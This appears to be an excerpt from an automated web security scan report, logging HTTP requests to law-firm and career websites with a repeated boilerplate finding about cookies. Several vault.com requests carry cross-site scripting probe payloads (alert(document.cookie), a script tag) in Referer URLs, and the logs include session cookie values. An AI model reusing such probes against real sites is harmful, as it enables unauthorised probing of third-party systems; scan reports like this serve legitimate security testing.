GET /practiceareas/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ru/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /zh-CHS/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /washington%20dc%20law%20firms HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011insights.cfm?contentID=52 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni/Index.cfm?contentID=7 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com.vault.home.portlets/homeflash802010.xml HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
<?xml version="1.0" encoding="utf-8" standalone="no"?> <vaultxml> <bgcolor>FFFFFF</bgcolor> <headertext>What's the key to your career success?</headertext> <contentlist> <listentry> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com.vault.home.portlets/homepage_flash.swf HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/arrow-right-middle.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/backgrounds/blue_gradient_reviews.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/backgrounds/footer_background.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/backgrounds/header-gray.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/blogs/photo-small-1260.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/dotted_separator.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/employer_section_header.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.1.10.1295451341; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/favicon.ico HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/header_background.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.1.10.1295451341; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/home/icon-resume.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/home/no_flash.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/01newjob.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/02reshelp.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/04coreviews.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/06salary.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepageFlash/07careerchange.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/business-people.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/cart-green.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
